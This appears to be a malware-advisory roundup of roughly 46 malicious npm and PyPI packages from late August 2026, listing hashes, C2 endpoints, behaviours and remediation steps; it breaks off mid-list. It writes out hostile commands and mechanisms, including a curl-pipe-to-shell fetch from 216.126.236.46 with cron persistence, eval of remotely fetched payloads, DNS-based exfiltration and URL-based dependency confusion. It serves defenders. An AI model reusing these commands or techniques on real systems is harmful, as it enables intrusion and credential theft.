GitHub Advisory malware sweep - 2026-08-29 batch (npm `access-token-delta` vercel.app remote-eval cluster (3, `eth-pino` + `js-array-tokens` + `js-tokens-array`) + npm `limbomail.com` Discord-MFA Windows dropper pair (`mfacord` + `mfakit`) + npm `secretkey2fa` Minecraft/Microsoft-account stealer + npm `supersignaturenature` RSA/DES chain via `manager-thedate` + npm `techportal` HTTP+DNS beacon to `oob.asm5.net` + npm `vs-modules` Windows .bat dropper + npm `vitest-chalk-pro` jsonbin.io detached-child C2 + npm `repo.securityctrl.com` mass dependency-confusion probe (18+ enterprise namespaces: Intuit, Atlassian, Firebase, Postman, Oracle, Amplitude, Ring, Alimama, Nx, Libra…) + npm `grafeno-*` preinstall + cron persistence cluster (9 packages, 216.126.236.46/x.sh) + PyPI `calcboxlite` + `pygame-renderkit` misc + massive scripted CWE-506 bursts (`3layerdipstack*` ~100+, `classlink-*` ~100+))
Large 24h window ending 2026-08-29: the standout is a compromise of @7nohe/openapi-react-query-codegen by the "Trinitite" Mini Shai-Hulud continuation (tracked separately). Around it: three coordinated operator clusters with full IOCs (npm vercel.app remote-eval typosquats, npm limbomail.com Discord-MFA droppers, npm repo.securityctrl.com mass enterprise-namespace dependency-confusion probe), a grafeno-* cron-persistence cluster, and hundreds of scripted CWE-506 boilerplate burst-publishes (3layerdipstack*, classlink-*).
- Detected by
- GitHub Advisory Database · OpenSSF malicious-packages · OpenSSF Package Analysis · Amazon Inspector · kam193
- Also known as
- 2026-08-29 GHSA sweep · 2026-08-access-token-delta vercel remote-eval typosquats · 2026-08-limbomail Discord-MFA Windows dropper · 2026-08-securityctrl dependency-confusion probe · 2026-08-grafeno cron persistence · 2026-08-3layerdipstack burst · 2026-08-classlink burst · 2026-08-pygame-renderkit
- Ecosystems
- npmPyPI
- Packages tracked
- 46
What happened
The 24-hour window ending 2026-08-29 published a very large batch of new GHSA malware advisories - the headline is a compromise of @7nohe/openapi-react-query-codegen by a new "Trinitite" Mini Shai-Hulud worm (tracked separately in npm-2026-08-28-trinitite-openapi-react-query-codegen). Around it: three tightly-coordinated npm operator clusters with full IOCs, a Brazilian-fintech-targeted grafeno-* cron-persistence cluster, a mass enterprise-namespace dependency-confusion probe hitting more than 18 confirmed namespaces from repo.securityctrl.com, and two scripted bursts (3layerdipstack*, classlink-*) numbering in the hundreds of low-signal CWE-506 boilerplate advisories.
Cluster A - npm access-token-delta.vercel.app / ipcheck-hashed.vercel.app remote-eval typosquat cluster
| Package | Versions | GHSA | Source hash | MAL id | Endpoint | |---|---|---|---|---|---| | eth-pino | 2.0.3 | GHSA-v75q-x2qc-4c7r | 81e08c03…5fb8c1 | MAL-2026-15554 | ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df | | js-array-tokens | 1.0.2 | GHSA-ffxr-prpr-hxxc | 3d54ea75…056023 | MAL-2026-15555 | access-token-delta.vercel.app/ | | js-tokens-array | 1.0.0, 1.1.1 | GHSA-8crw-r25r-mwv4 | 3f8ed553…dcc35b | MAL-2026-15556 | access-token-delta.vercel.app/ |
On module load each package reconstructs a Vercel URL from a char-code array, fetches JSON, and passes the response's token field to eval() (or new Function()). Payloads are mutable, so what was delivered on installation depends entirely on when the install ran. eth-pino typosquats pino; js-array-tokens / js-tokens-array typosquat the extremely popular js-tokens tokenizer.
Cluster B - npm limbomail.com Discord-MFA Windows dropper pair
| Package | Versions | GHSA | Source hash | MAL id | |---|---|---|---|---| | mfacord | 1.0.2, 1.0.3 | GHSA-cx4f-wffj-qfxm | 6e8426c0…c970e | MAL-2026-15557 | | mfakit | 1.4.0 | GHSA-r4f7-w4j9-xj27 | f11dc9d3…3fb8 | MAL-2026-15558 |
Shared IOCs (same operator): C2 https://limbomail.com/api/attachment/r_Ea6rT_kGfT.o7nh0aBVvDQWmOG47NPBQ3pUjd_uHeiw; dropped file %APPDATA%\Microsoft\Windows\WinSxS\Backup\winsvc.js; VBS launcher in Startup; HKCU\...\Run persistence; re-fetch every ~2h with TLS verification disabled.
Cluster C - npm secretkey2fa@1.0.1 Minecraft / Microsoft-account stealer
| Package | Version | GHSA | Source hash | MAL id | |---|---|---|---|---| | secretkey2fa | 1.0.1 | GHSA-wrp2-cvjj-h5jx | e1da4c28…8f501a | MAL-2026-15559 |
Windows-only postinstall: enumerates Windows Credential Manager via PowerShell P/Invoke; steals Minecraft launcher JSON, Microsoft Account refresh + access tokens, Xbox Live tokens; decrypts browser saved credentials via Chromium DPAPI; exfiltrates via a hardcoded Discord webhook (XOR-0x3F encoded). Anti-analysis env gate skips execution under npm audit / npm pack / CI.
Cluster D - npm supersignaturenature + manager-thedate RSA/DES chain
| Package | Versions | GHSA | Source hash | MAL id | |---|---|---|---|---| | supersignaturenature | 1.0.5, 1.0.6 | GHSA-v7mw-8r4v-4jqq | ab1df028…75e4b15 | MAL-2026-15560 |
Encrypted rsaToken in the tarball is decrypted with a DES key fetched from the runtime dependency manager-thedate (pinned to latest), then the decrypted JavaScript is executed via child_process.spawn('node', [], ...) on stdin. The latest pin on manager-thedate is the payload-rotation channel - the operator can change what the payload does without republishing supersignaturenature.
Cluster E - npm techportal@4.0.10 HTTP + DNS beacon
| Package | Version | GHSA | Source hash | MAL id | IOCs | |---|---|---|---|---|---| | techportal | 4.0.10 | GHSA-649g-mjr9-4j74 | 2d947d5b…23242f3 | MAL-2026-15561 | http://45.76.249.245/beacon/techportal/4.0.10; *.oob.asm5.net (3 collectors) |
preinstall runs node beacon.js. HTTP POST first, DNS-subdomain-label fallback second - the DNS fallback bypasses HTTP-only egress proxies.
Cluster F - npm vs-modules@1.2.2 Windows .bat dropper
| Package | Version | GHSA | Source hash | IOC | |---|---|---|---|---| | vs-modules | 1.2.2 | GHSA-vg83-965g-3w5v | dcd50c73…efedb57 | http://whaomydaddy.bts-the-time-in-shanghai.netlify.app/hey.bat |
preinstall runs node resources.js which downloads hey.bat to %TEMP% via plain HTTP curl and executes it. Windows-only.
Cluster G - npm vitest-chalk-pro@10.0.7 jsonbin C2
| Package | Version | GHSA | Source hash | MAL id | IOC | |---|---|---|---|---|---| | vitest-chalk-pro | 10.0.7 | GHSA-rjfw-6xw6-qjfx | 4718de97…156f0e | MAL-2026-15563 | https://api.jsonbin.io/v3/b/6a62bc86da38895dfe879659 |
postinstall spawns a detached, silenced-stdio child that fetches JSON and executes via new Function(). Payload is mutable at any time.
Cluster H - npm repo.securityctrl.com mass dependency-confusion probe
Self-referential package.json dependency whose value is "<pkgname>": "https://repo.securityctrl.com/<pkgname>". During npm install the URL is fetched and executed without integrity verification.
| Package | Versions | GHSA | Namespace target | |---|---|---|---| | intuit-authz | 55.0.0 | GHSA-7v69-f2ff-7267 | Intuit | | one-intuit-help-system-utils | 45.0.0 | GHSA-hj36-mq3p-257w | Intuit | | qbo-ui-services | 45.0.0 | GHSA-pqq9-pc7f-qg9c | Intuit / QuickBooks | | payments-ui-services | 45.0.0 | GHSA-gh4x-ppwf-3j59 | Intuit | | jira-projects-backbone | 45.0.0 | GHSA-mgjj-8534-64gp | Atlassian | | confluence-rest | 30.0.0 | GHSA-wxw7-x2qj-6jh2 | Atlassian | | firestore-lite | 45.0.0 | GHSA-r28g-prq7-6j7p | Google Firebase | | amplitude-experiment | 55.0.0 | GHSA-758g-5xc5-pm3c | Amplitude | | paper-password-input | 45.0.0 | GHSA-g76m-37ph-2w5c | React-native-paper lookalike | | oit-lib-oracle-util | 45.0.0 | GHSA-8jwf-jxvr-v3qg | Oracle | | nx-app | 9999.0.0-security-test | GHSA-h9j7-rx3x-rwhc | Nrwl / Nx | | alimama-minisite | 45.0.0 | GHSA-587j-f248-fmvr | Alimama (Alibaba) | | librastandardlib | 45.0.0 | GHSA-g4fg-jh8h-vf3p | Libra / Diem | | mkt-ui-library | 45.0.0 | GHSA-58mp-f2cw-5j5r | Generic enterprise UI | | bui-react-10themes | >= 45.0.0 | GHSA-jv92-xghh-84rr | Generic enterprise UI | | sentrykit | 30.0.0 | GHSA-mr25-fm7h-7p84 | Sentry-lookalike | | vui-gateway | 45.0.0 | GHSA-799x-vgvf-pxp4 | Generic | | search-reservation | 55.0.0 | GHSA-293v-ghq2-4rr4 | Generic |
GHSA carries dozens more names in the same publisher fingerprint than are enumerated above - treat every flagged package matching the pattern "implausibly-high major-version + repo.securityctrl.com IOC" as one campaign. The 9999.0.0-security-test suffix on nx-app reads as legitimate security-research red-team activity, but the mechanism executes code from an external URL on install regardless of intent.
Cluster I - npm grafeno-* preinstall + cron persistence
Every package: preinstall runs curl http://216.126.236.46/x.sh | sh then adds a crontab entry re-fetching x.sh every 30 minutes.
| Package | Versions | GHSA | Source hash | |---|---|---|---| | grafeno-auth | 1.0.0 | GHSA-wp54-r527-gf42 | c3c99ded…7ca59a | | grafeno-client | 1.0.0 | GHSA-682f-95rp-28w4 | 61f8e4ee…2ccb6 | | grafeno-utils | 1.0.0 | GHSA-hfcc-rc45-2cgg | 5beb233f…4d32ad | | grafeno-config | 1.0.0 | GHSA-r3jq-7mgh-v97x | ebbea90a…4ce6af | | grafeno-api | 1.0.0, 1.0.1 | GHSA-qh5m-rwf7-x3r2 | 6324266a…4333c | | grafeno-core | 1.0.0, 1.0.1 | GHSA-6g3v-w4g2-wpjc | 19a2990a…4c759e | | grafeno-pix | 1.0.0, 1.0.1 | GHSA-4wxj-99qv-hg78 | a5c5e164…6c3f3 | | grafeno-logger | 1.0.0, 1.0.1 | GHSA-pv35-j495-vmj4 | 64770429…d413 | | grafeno-sdk | 1.0.0, 1.0.1 | GHSA-fg63-r25c-3gf6 | 665dd78a…102ad3 |
Brazilian fintech target: Grafeno is a Brazilian banking-as-a-service provider; grafeno-pix explicitly references Brazil's PIX payment rails. Any Brazilian fintech running internal @grafeno/*-adjacent scopes should audit resolver configuration.
Cluster J - npm scripted CWE-506 boilerplate mass bursts
3layerdipstack<random>cluster: 100+ packages, each3layerdipstack+ 6-8 random alphanumeric characters, all>= 0, all pure CWE-506 boilerplate. Spans pages 4-15+ of the GHSA npm-malware listing on 2026-08-29.classlink-<random>cluster: 100+ packages, eachclasslink-+ 8-char random suffix, all>= 0, all pure CWE-506 boilerplate. Spans pages ~20-30+ of the GHSA listing on 2026-08-29.- Additional low-signal boilerplate this batch:
eip712-lite(GHSA-p5jf-vqp6-95h5, Ethereum EIP-712 typosquat),clmm-fee-audit(GHSA-68fh-772h-wjfw, Solana CLMM theme),borsh-lite(GHSA-6m7x-mwxq-f3wf, Solana Borsh typosquat),mfa-js(GHSA-2p92-fvvr-75hj),ozturk-mfa(GHSA-wrj4-48g5-vg88).
No per-package IOCs published for the boilerplate advisories - defensive value is prefix-level: block 3layerdipstack* and classlink-* at your registry / SCA layer and move on.
Cluster K - PyPI calcboxlite + pygame-renderkit misc
| Package | Version | GHSA | Source hash | Note | |---|---|---|---|---| | calcboxlite | 1.0 | GHSA-q2qg-w4f2-8v29 | 227fe04d…7afd09 | HTTP POST to k4m2qhx7ptv9nzcr3bwe8syd6ljfa0gu1.oast.invalid/collect; MAL-2026-15488 | | pygame-renderkit | 1.2.0 | GHSA-53q9-ghm7-r8g3 | 5856daeb…5f78f9 | setup.py override; reverse shell; campaign 2026-08-pygame-renderkit |
The .invalid TLD on calcboxlite confirms out-of-band pentest probing; pygame-renderkit's reverse shell in setup.py is a real live payload.
Registry state
All enumerated packages were flagged / yanked on npm and PyPI during the 2026-08-28 / 2026-08-29 takedown windows. Internal mirrors routinely keep serving yanked tarballs; re-sync every mirror.
Related tracked activity
- "Trinitite" Mini Shai-Hulud continuation - tracked separately in npm-2026-08-28-trinitite-openapi-react-query-codegen. Cluster H's dependency-confusion probe against
intuit-authzshares no operator overlap with Trinitite - two independent campaigns landing in the same 24h window. 2026-08-ekx-report-utilsPyPI DNS-exfil family (updated 2026-08-29): three additional PyPI packages (yaml-report-formatter,yamlformat-tools,yamlformatter-utils) added to the multi-2026-08-28-ghsa-malware-sweep Cluster D under the shared campaign identifier.issue_commentrelease-workflow abuse - the same trigger class exploited in Codfish semantic-release-action (2026-06-24) drove the Trinitite compromise; author-association gates onissue_commentandpull_request_targettriggers remain the most under-defended CI-CD hardening step across npm-registered maintainers.- Discovery credits:
GitHub Advisory Database,OpenSSF malicious-packages,OpenSSF Package Analysis,Amazon Inspector,kam193(bad-packages.kam193.eu),Aikido Security(Trinitite),SafeDep(Trinitite).
Affected packages (46)
- npmalimama-minisite45.0.0
- npmamplitude-experiment55.0.0
- npmborsh-lite
- npmbui-react-10themes
- PyPIcalcboxlite1.0
- npmclmm-fee-audit
- npmconfluence-rest30.0.0
- npmeip712-lite
- npmeth-pino2.0.3
- npmfirestore-lite45.0.0
- PyPIflask-header-guard1.0.0
- npmgrafeno-api1.0.01.0.1
- npmgrafeno-auth1.0.0
- npmgrafeno-client1.0.0
- npmgrafeno-config1.0.0
- npmgrafeno-core1.0.01.0.1
- npmgrafeno-logger1.0.01.0.1
- npmgrafeno-pix1.0.01.0.1
- npmgrafeno-sdk1.0.01.0.1
- npmgrafeno-utils1.0.0
- npmintuit-authz55.0.0
- npmjira-projects-backbone45.0.0
- npmjs-array-tokens1.0.2
- npmjs-tokens-array1.0.01.1.1
- npmlibrastandardlib45.0.0
- npmmanager-thedate1.0.151.0.16
- npmmfa-js
- npmmfacord1.0.21.0.3
- npmmfakit1.4.0
- npmmkt-ui-library45.0.0
- npmnx-app9999.0.0-security-test
- npmoit-lib-oracle-util45.0.0
- npmone-intuit-help-system-utils45.0.0
- npmozturk-mfa
- npmpaper-password-input45.0.0
- npmpayments-ui-services45.0.0
- PyPIpygame-renderkit1.2.0
- npmqbo-ui-services45.0.0
- npmsearch-reservation55.0.0
- npmsecretkey2fa1.0.1
- npmsentrykit30.0.0
- npmsupersignaturenature1.0.51.0.6
- npmtechportal4.0.10
- npmvitest-chalk-pro10.0.7
- npmvs-modules1.2.2
- npmvui-gateway45.0.0
These are usually pulled in as transitive dependencies rather than installed directly. Check your whole tree at once - it runs in your browser and nothing is uploaded.
Impact
- Cluster A - npm
access-token-delta.vercel.app/ipcheck-hashed.vercel.appremote-eval typosquat cluster (2026-08-29, 3 packages):eth-pino@2.0.3(GHSA-v75q-x2qc-4c7r, hash81e08c035ca41519f1d57d389027befac80a8ee8405612825b633967db5fb8c1, MAL-2026-15554),js-array-tokens@1.0.2(GHSA-ffxr-prpr-hxxc, hash3d54ea75aacb3eed3e1f1739093eb9b0092203fafca42d590bce038530056023, MAL-2026-15555),js-tokens-array@1.0.0, 1.1.1(GHSA-8crw-r25r-mwv4, hash3f8ed5536e88f2c77c432b868367e25dea9244052779e825999e6e4324dcc35b, MAL-2026-15556). All three reconstruct a Vercel-hosted URL from a char-code array on module load, fetch a JSON response, and pass the response'stokenfield directly toeval()(ornew Function()) - full remote-code execution in any Node.js process thatrequire()s them, with the payload mutable at any time by the operator.eth-pinotyposquatspino(the log library) with an Ethereum-flavoured prefix;js-array-tokensandjs-tokens-arraytyposquat the popularjs-tokenstokenizer (110M weekly downloads). IOCs:https://access-token-delta.vercel.app/(js-array-tokens, js-tokens-array),https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df(eth-pino). Sequential MAL-2026-15554/15555/15556 IDs confirm one operator - Cluster B - npm
limbomail.comDiscord-MFA Windows dropper pair (2026-08-29, 2 packages):mfacord@1.0.2, 1.0.3(GHSA-cx4f-wffj-qfxm, hash6e8426c0e4e80e0bd9839d8517e060bd923775b8a3e100aab57e18b4f47c970e, MAL-2026-15557) andmfakit@1.4.0(GHSA-r4f7-w4j9-xj27, hashf11dc9d39df6906a4b784b0cb3a584b5307816d20c4cc04fb28bbb40f59c3fb8, MAL-2026-15558). Both masquerade as "lightweight Discord MFA/TOTP libraries" and share the identical C2 URLhttps://limbomail.com/api/attachment/r_Ea6rT_kGfT.o7nh0aBVvDQWmOG47NPBQ3pUjd_uHeiwand the identical dropped-file path%APPDATA%\Microsoft\Windows\WinSxS\Backup\winsvc.js- same operator. On Windows only: decode obfuscated URL, download script to theWinSxS\Backuppath, hide it via file attributes, deploy a VBS launcher to the user's Startup folder, registerHKCU\...\Runpersistence, re-fetch every ~2 hours with TLS verification disabled. Anyone who rannpm installfor these on Windows: assume a persistent scheduled downloader is live on the box - Cluster C - npm
secretkey2fa@1.0.1Minecraft / Microsoft-account stealer (2026-08-29, 1 package):secretkey2fa@1.0.1(GHSA-wrp2-cvjj-h5jx, hashe1da4c2863f6f6fb95a1ab802243bfde5e04a71e4aa6f0b41f940502d58f501a, MAL-2026-15559). Masquerades as a "lightweight TOTP/HOTP library".postinstallon Windows: enumerates Windows Credential Manager via PowerShell P/Invoke, steals Minecraft launcher account JSONs and Microsoft Account refresh + access tokens (login.live.com, Xbox Live,minecraftservices), decrypts browser saved credentials via Chromium DPAPI, exfiltrates via a hardcoded Discord webhook (XOR-0x3F encoded). Includes an anti-analysis env gate that skips execution duringnpm audit/npm pack/ CI to lower discovery odds. Any Windows user who ran this: rotate Microsoft Account / Xbox / Minecraft credentials and browser saved passwords from a clean host - Cluster D - npm
supersignaturenature@1.0.5, 1.0.6RSA/DES chain viamanager-thedatedependency (2026-08-29, 1 direct package + 1 chained runtime dep):supersignaturenature@1.0.5, 1.0.6(GHSA-v7mw-8r4v-4jqq, hashab1df02839294b29ff278b7a80505be50de75eb0f317f4bf29635236a75e4b15, MAL-2026-15560). Distributed tarball carries an encryptedrsaTokenfile absent from the source repository; on install a DES key is pulled from the runtime dependencymanager-thedate(pinned tolatest), used to decrypt the token, and the decrypted JavaScript is executed viachild_process.spawn('node', [], ...)on stdin. Thelatestpin onmanager-thedateis the interesting operational detail: the operator can rotate the payload post-installation by publishing a newmanager-thedaterelease, without needing to touchsupersignaturenatureagain - *Cluster E - npm
techportal@4.0.10HTTP + DNS beacon to `.oob.asm5.net(2026-08-29, 1 package)**:techportal@4.0.10(GHSA-649g-mjr9-4j74, hash2d947d5b4ddaa0ea6a25488fb5b5a66b3afc5c8f56d5ac38fb2e95e4b23242f3, MAL-2026-15561).preinstallrunsnode beacon.js, collects hostname / username / cwd, base32-encodes, POSTs tohttp://45.76.249.245/beacon/techportal/4.0.10; on HTTP failure/timeout falls back to packing the same identifiers as base32 DNS subdomain labels queried against three hardcoded*.oob.asm5.netcollector domains. Egress-firewall bypass: DNS-based fallback survives HTTP-only proxy policies. Theoob.asm5.net"out-of-band" naming is characteristic of pentest tooling (asm5` reads as a pentester callsign) but a real hit still yields useful reconnaissance to the operator - Cluster F - npm
vs-modules@1.2.2Windows .bat dropper (2026-08-29, 1 package):vs-modules@1.2.2(GHSA-vg83-965g-3w5v, hashdcd50c73d1e9bbca9b707d80936562866b7469239c038a540c02a9f43efedb57).preinstallhook runsnode resources.js, downloadshttp://whaomydaddy.bts-the-time-in-shanghai.netlify.app/hey.bat(plain HTTP, obfuscator.io-style string-array obfuscation), drops to%TEMP%, and executes viachild_process.execwithout integrity check. Windows-only. Any Windows box that rannpm installforvs-modules@1.2.2should be treated as executing arbitrary code from a Netlify-hosted.bat - Cluster G - npm
vitest-chalk-pro@10.0.7jsonbin.io detached-child C2 (2026-08-29, 1 package):vitest-chalk-pro@10.0.7(GHSA-rjfw-6xw6-qjfx, hash4718de971af33ad02b8945e1b981e30d1decbf9c7d1006f37a641cd822156f0e, MAL-2026-15563).postinstallspawns a detached child (silenced stdio) that uses axios to fetchhttps://api.jsonbin.io/v3/b/6a62bc86da38895dfe879659and executes the response vianew Function(). Payload is mutable at any time by the operator; the detached-child + silenced-stdio combo means the child survives the parentnpm installcompleting and does not surface in normal install output. Masquerades as avitest/chalkutility but internally mimicsnodemailer's package shape - Cluster H - npm
repo.securityctrl.commass enterprise-namespace dependency-confusion probe (2026-08-29, 18+ packages, "9999.0.0-security-test" / 30.0.0 / 45.0.0 / 55.0.0 versions): implausibly-high version numbers + a self-referential dependency inpackage.jsonwhose value is a bare HTTPS URL rather than a registry version range - specifically"<pkgname>": "https://repo.securityctrl.com/<pkgname>". Duringnpm installthe URL is fetched and executed without integrity verification, granting arbitrary code execution via lifecycle scripts on any internal CI that misresolves to the public registry. Confirmed names span major enterprise namespaces: Intuit (intuit-authz@55.0.0,one-intuit-help-system-utils@45.0.0,qbo-ui-services@45.0.0,payments-ui-services@45.0.0); Atlassian (jira-projects-backbone@45.0.0,confluence-rest@30.0.0); Firebase (firestore-lite@45.0.0); Amplitude (amplitude-experiment@55.0.0); Postman (paper-password-input@45.0.0- matches Postman React lookalike naming); Oracle (oit-lib-oracle-util@45.0.0); Nx (nx-app@9999.0.0-security-test); Alimama / Alibaba (alimama-minisite@45.0.0); Libra/Diem (librastandardlib@45.0.0); plus enterprise-UI names (mkt-ui-library@45.0.0,bui-react-10themes@>=45.0.0,sentrykit@30.0.0,vui-gateway@45.0.0,search-reservation@55.0.0). The GHSA listing on 2026-08-29 shows dozens more names in the same pattern than are enumerated here - the entire flagged set on GHSA for that publisher fingerprint should be treated as one campaign. The9999.0.0-security-testversion suffix onnx-appstrongly suggests legitimate red-team / security research, but the mechanism is real: any internal CI misconfigured to fall through to the public registry would execute code fromrepo.securityctrl.comregardless of who published it - *Cluster I - npm `grafeno-
preinstall + cron persistence cluster (2026-08-29, 9 packages,216.126.236.46/x.sh)**:grafeno-auth@1.0.0(GHSA-wp54-r527-gf42, hashc3c99ded091548bc464635b9c1151368873851c4a97036279f46f74b5c7ca59a),grafeno-client@1.0.0(GHSA-682f-95rp-28w4, hash61f8e4ee9fb4623ef1d751c00c885e412b6e6760d0aaf79c655272a90882ccb6),grafeno-utils@1.0.0(GHSA-hfcc-rc45-2cgg, hash5beb233fe40ca775519f2262a691a45445a9bda31c970d12aca3c584be4d32ad),grafeno-config@1.0.0(GHSA-r3jq-7mgh-v97x, hashebbea90af14e110b5dcef171163ea3029f6655ecf623595c251f44db674ce6af),grafeno-api@1.0.0, 1.0.1(GHSA-qh5m-rwf7-x3r2, hash6324266ac0f7a76fc3a8e8209d194daa17bdd47c913207f218f7c1683db4333c),grafeno-core@1.0.0, 1.0.1(GHSA-6g3v-w4g2-wpjc, hash19a2990abd7b4447444a42f96636f738449235f9d8760191978e904d028c759e),grafeno-pix@1.0.0, 1.0.1(GHSA-4wxj-99qv-hg78, hasha5c5e1649c30ab63a97fde3073d5e838ea91f5b2eca8149242f0fb24e286c3f3),grafeno-logger@1.0.0, 1.0.1(GHSA-pv35-j495-vmj4, hash6477042981913de82e89d0f0c3c5b1b278afd21c401922932eb8756427e1d413),grafeno-sdk@1.0.0, 1.0.1(GHSA-fg63-r25c-3gf6, hash665dd78adc2d9c5f30bd8b140dc2dfc5bf9e61efb96ea9945018154d43102ad3). Every package: **preinstallhook thatcurlshttp://216.126.236.46/x.shover plain HTTP and pipes it to shell, then adds a crontab entry that re-fetches every 30 minutes** - initial compromise plus a persistent 30-minute-cadence downloader on Linux / macOS build boxes.grafeno-*naming suggests targeting Brazilian fintech (Grafenois a Brazilian banking-as-a-service provider;grafeno-pixexplicitly references Brazil's PIX payment rails). Every affected build box needs its crontab audited and anyx.sh`-triggered persistence purged - Cluster J - npm scripted CWE-506 boilerplate mass bursts (2026-08-28, 200+ packages across two clusters):
3layerdipstack<random-suffix>cluster (100+ packages, GHSA IDs at least across pages 4-15 of the current GHSA npm-malware listing, all>= 0versions, all pure CWE-506 boilerplate advisories) andclasslink-<random-suffix>cluster (100+ packages, similar scripted burst, all pure CWE-506 boilerplate). No per-package IOCs published. The publish-flood pattern - random alphanumeric suffixes on a fixed root name, hundreds of publishes within one window - is characteristic of scripted-account abuse. The exact operational value here is "if any lockfile hit lands under3layerdipstack*orclasslink-*, uninstall it - no defensive review is worth spending on any single member". Also in this cluster tail:eip712-lite(GHSA-p5jf-vqp6-95h5, Ethereum EIP-712 typosquat),clmm-fee-audit(GHSA-68fh-772h-wjfw, Solana Concentrated Liquidity Market Maker theme),borsh-lite(GHSA-6m7x-mwxq-f3wf, Solana Borsh serialisation typosquat),mfa-js(GHSA-2p92-fvvr-75hj),ozturk-mfa(GHSA-wrj4-48g5-vg88) - all>= 0, all CWE-506 boilerplate with no per-package IOCs - Cluster K - PyPI
calcboxlite+pygame-renderkitmisc (2026-08-28, 2 packages):calcboxlite@1.0(GHSA-q2qg-w4f2-8v29, hash227fe04d85516bd5348dea2c0c25078d057eacb4f439fd6a241ea0409b7afd09, MAL-2026-15488). Install-time and import-time HTTP-POST exfil of username + hostname tohttps://k4m2qhx7ptv9nzcr3bwe8syd6ljfa0gu1.oast.invalid/collect- the.invalidTLD is the tell that this is a pentest / OAST callback probe (a Burp Collaborator-style out-of-band beacon).pygame-renderkit@1.2.0(GHSA-53q9-ghm7-r8g3, hash5856daeb3070a9b2a6ffc42d8999ff49c63706ccb27ee683e5fcc4ff175f78f9, campaign2026-08-pygame-renderkit).setup.pycommand override that exfiltrates env vars and files, drops a persistence stub, and opens a reverse shell for remote command execution - Standalone tracked separately -
@7nohe/openapi-react-query-codegen"Trinitite" worm compromise (2026-08-28, 10 versions): not enumerated in this sweep - covered in dedicated record npm-2026-08-28-trinitite-openapi-react-query-codegen. Any team using TanStack Query codegen against OpenAPI schemas should read that record first
What to do
- 1Grep every lockfile (
package-lock.json,yarn.lock,pnpm-lock.yaml,requirements.txt,Pipfile.lock,poetry.lock,uv.lock) for:eth-pino,js-array-tokens,js-tokens-array,mfacord,mfakit,secretkey2fa,supersignaturenature,manager-thedate,techportal,vs-modules,vitest-chalk-pro,intuit-authz,one-intuit-help-system-utils,qbo-ui-services,payments-ui-services,jira-projects-backbone,confluence-rest,firestore-lite,amplitude-experiment,paper-password-input,oit-lib-oracle-util,nx-app,alimama-minisite,librastandardlib,mkt-ui-library,bui-react-10themes,sentrykit,vui-gateway,search-reservation,grafeno-auth,grafeno-client,grafeno-utils,grafeno-config,grafeno-api,grafeno-core,grafeno-pix,grafeno-logger,grafeno-sdk,eip712-lite,clmm-fee-audit,borsh-lite,mfa-js,ozturk-mfa,calcboxlite,pygame-renderkit. For the3layerdipstack*andclasslink-*clusters: grep for the prefix alone (grep -E "\"(3layerdipstack|classlink-)" package-lock.json) since 100+ names are in each - 2For Cluster A (
eth-pino/js-array-tokens/js-tokens-arrayremote-eval typosquats): uninstall on hit; anyone whorequire()d these executed arbitrary JavaScript delivered byaccess-token-delta.vercel.app/ipcheck-hashed.vercel.app. Because those Vercel endpoints are attacker-mutable, the exact payload delivered depends on when the install happened - treat every install-time environment as fully compromised. Block those two Vercel hostnames at egress and audit any developer / CI box that resolved them. Thejs-tokenslegitimate package has no-arrayvariants; any developer typingnpm install js-tokens-arrayin the future is still at risk, so add these names to your allow/deny lists - 3For Cluster B (
limbomail.comDiscord-MFA Windows droppermfacord+mfakit): on any Windows host that rannpm installfor either package, inspect and remove the file at%APPDATA%\Microsoft\Windows\WinSxS\Backup\winsvc.js, remove any VBS launcher in the user's Startup folder, and delete theHKCU\Software\Microsoft\Windows\CurrentVersion\Runentry pointing at that path. Blocklimbomail.comat egress; the payload re-fetches every ~2 hours so the persistence is active for as long as the entry lives - 4For Cluster C (
secretkey2faMinecraft / Microsoft-account stealer): any Windows user who ran the install must rotate Microsoft Account credentials (change password to invalidate stolen refresh tokens), revoke Xbox Live sessions, rotate Minecraft launcher account, and rotate any browser saved credentials for that Windows profile. The env gate that suppresses execution duringnpm audit/npm pack/ CI means a--dry-runorauditwill not necessarily surface the payload - 5For Cluster D (
supersignaturenature+manager-thedatechain): uninstall both packages together and grep formanager-thedatespecifically - it is the payload-rotation delivery vehicle; being onlatestmeans any consumer who resolvedmanager-thedateafter 2026-08-29 got the operator's current payload.npm ls manager-thedateacross every workspace to find every indirect consumer - 6For Cluster E (
techportalHTTP + DNS beacon): uninstall on hit. Block45.76.249.245at egress. DNS-based fallback bypasses HTTP-only egress proxies: if your egress policy is proxy-only, either DNS-egress-block*.oob.asm5.netat your resolver, or - better - deny wildcard subdomain resolution for arbitrary TLDs from install-time contexts. Fornpm installin CI,--ignore-scriptsprevents thepreinstall beacon.jsstep from running - 7For Cluster F (
vs-modulesWindows .bat dropper): uninstall on hit. Blockbts-the-time-in-shanghai.netlify.appat egress. Any Windows host that installedvs-modules@1.2.2executed an attacker-controlled batch file from%TEMP%- treat the box as compromised and rotate credentials - 8For Cluster G (
vitest-chalk-projsonbin C2): uninstall on hit. Blockapi.jsonbin.ioat egress for install-time / postinstall-time contexts (or use--ignore-scriptsin CI). Because the child is detached with silenced stdio, standard install logging will not show it - inspect the process tree for any child spawned bynpm installthat outlives the parent - 9For Cluster H (
repo.securityctrl.commass dependency-confusion probe against enterprise namespaces): if you run internal CI for Intuit, Atlassian, Firebase, Postman, Oracle, Amplitude, Alimama/Alibaba, Nx, or any of the other confirmed target namespaces, audit your npm resolver configuration immediately. Pin scope-registry mappings via.npmrc(@intuit:registry=https://<internal>,@atlassian:registry=https://<internal>, etc.) and ensure the CI environment cannot fall through to the public registry on internal-index failure. Also block the entirerepo.securityctrl.comdomain at egress for CI environments - a legitimate build should never need to fetch package tarballs from an arbitrary HTTPS URL that is not the registry. Anypackage.jsonin any repo containing a self-referential dependency whose value is a bare HTTPS URL is a red flag regardless of the specific host - 10*For Cluster I (`grafeno-
preinstall + cron persistence)**: on any Linux / macOS build box that rannpm installfor anygrafeno-*package, runcrontab -l(as every user account that touched the install) and remove any entry pointing at216.126.236.46orx.sh. Block216.126.236.46at egress. Brazilian fintech shops using the legitimateGrafeno` BaaS should audit their internal package scopes: this operator is naming-target-selecting your ecosystem specifically - 11*For Cluster J (mass `3layerdipstack
